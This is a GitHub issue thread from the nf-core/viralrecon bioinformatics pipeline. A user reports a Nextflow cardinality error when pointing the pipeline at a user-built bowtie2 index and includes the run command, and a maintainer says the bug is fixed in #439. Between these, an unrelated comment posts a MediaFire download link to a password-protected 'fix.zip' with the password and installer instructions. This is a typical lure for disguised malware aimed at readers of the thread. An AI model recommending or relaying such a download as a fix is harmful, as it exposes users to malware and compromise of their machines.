### ISSUE TITLE
Error reading user provided bowtie2 index files

### ISSUE THREAD

**Issue by hkunerth** [nf-core/viralrecon#440]
### Description of the bug

I seem to be having trouble providing a correctly formatted bowtie2 index for parvovirus mapping. I've run bowtie2-build and generated the index and placed the files generated into a directory (references/ParvovirusB19/index). I'm pointing to this directory when running the pipeline, but I get this error:
```
WARN: Input tuple does not match input set cardinality declared by process `NFCORE_VIRALRECON:ILLUMINA:FASTQ_ALIGN_BOWTIE2:BOWTIE2_ALIGN` -- offending value: references/ParvovirusB19/index
ERROR ~ Error executing process > 'NFCORE_VIRALRECON:ILLUMINA:FASTQ_ALIGN_BOWTIE2:BOWTIE2_ALIGN (1)'
Caused by:
  Not a valid path value type: org.codehaus.groovy.runtime.NullObject (null)

```

I previously asked about the issue on [Slack](https://nfcore.slack.com/archives/C0110R22NH3/p1724430245300219).

### Command used and terminal output

```console
echo "Running viralrecon-nf"
${nextflow_exe} run ${module_dir}/main.nf \
	--input ${sample_sheet} \
	--outdir ${outdir} \
	--platform illumina \
	--protocol metagenomic \
	-profile singularity \
	--skip_asciigenome \
	--fasta ${module_dir}/references/ParvovirusB19/ParvovirusB19.fasta \
	--bowtie2_index ${module_dir}/references/ParvovirusB19/index/ \
	-c ${viralrecon_config_file} \
	--skip_pangolin \
	--skip_kraken2 ${skip_kraken2} \
	--skip_nextclade \
	-with-report ${outdir}/${run_name}_report.html \
	-resume
```

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Joon-Klaps** [comment]
Thanks for spotting, is fixed with #439!
